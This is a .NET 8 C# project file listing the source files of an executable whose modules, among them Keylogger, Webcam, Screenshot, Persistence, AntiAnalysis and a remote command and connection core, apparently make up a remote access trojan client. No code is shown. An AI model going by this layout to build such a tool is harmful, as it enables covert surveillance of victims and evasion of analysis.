<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <ItemGroup>
    <Compile Include="Config.cs" />
    <Compile Include="Core\ClientCore.cs" />
    <Compile Include="Core\ConnectionManager.cs" />
    <Compile Include="Core\Persistence.cs" />

    <Compile Include="Features\BlueScreen.cs" />
    <Compile Include="Features\ClipboardManager.cs" />
    <Compile Include="Features\Commands.cs" />
    <Compile Include="Features\FileManager.cs" />
    <Compile Include="Features\Keylogger.cs" />
    <Compile Include="Features\Screenshot.cs" />
    <Compile Include="Features\Webcam.cs" />

    <Compile Include="Utils\AntiAnalysis.cs" />
    <Compile Include="Utils\Crypto.cs" />
    <Compile Include="Utils\Helper.cs" />

    <Compile Include="Program.cs" />
  </ItemGroup>

</Project>